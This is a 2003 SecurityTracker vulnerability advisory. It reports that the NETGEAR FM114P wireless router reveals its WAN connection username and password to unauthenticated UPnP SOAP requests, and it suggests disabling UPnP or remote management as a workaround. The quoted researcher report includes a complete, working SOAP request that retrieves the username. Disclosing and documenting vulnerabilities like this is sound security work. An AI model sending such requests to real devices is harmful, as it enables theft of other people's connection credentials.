SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   NETGEAR Router Vendors:   NETGEAR
NETGEAR FM114P Prosafe Wireless Firewall Discloses Connection Password When Using UPNP
SecurityTracker Alert ID:  1006458
SecurityTracker URL:  http://securitytracker.com/id/1006458
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 4 2003
Impact:   Disclosure of authentication information, Disclosure of system information
Exploit Included:  Yes  
Version(s): Model FM114P; Firmware 1.4 Beta Release 21
Description:   A vulnerability was reported in the NETGEAR FM114P Wireless cable/DSL firewall router. The device may disclose authentication information to remote users when Universal Plug and Play (UPNP) is used.

It is reported that a remote user can invoke a UPNP SOAP request (GetUserName, GetPassword) to obtain the WAN username and password from the device. The router will reportedly supply this information if remote access and UPNP are enabled.

An example SOAP request is shown in the Source Message.

Impact:   A remote user can view the WAN connection username and password (if the router is configured for remote access and UPNP).
Solution:   No solution was available at the time of this entry. The author of the report indicates that you can disable remote management and/or UPNP as a workaround.
Vendor URL:  www.netgear.com/products/prod_details.asp?prodID=138 (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  Another security problem in Netgear FM114P ProSafe Wireless Router firmware


hi,
i found another security problem in netgear prosafe wireless router model
FM114P:
when remote-access and upnp features are enabled, the WAN connection
username and password can be retrieved without any authentication using
upnp. if remote management is enabled anyone can do this from the web. this
is done by using upnp soap requests to the router with the functions
router configuration is normally done via web-interface.

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
   <s:Body>
      <u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
   </s:Body>
</s:Envelope>

---- end of example request to get username   --------------


affected firmware versions: --> v1.4 Beta Release 21 has been tested
                            --> all previous versions with upnp may be
affected

solution: disable remote management and/or upnp until bug is fixed by
netgear

regards, b.stickler


http://intex.ath.cx



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC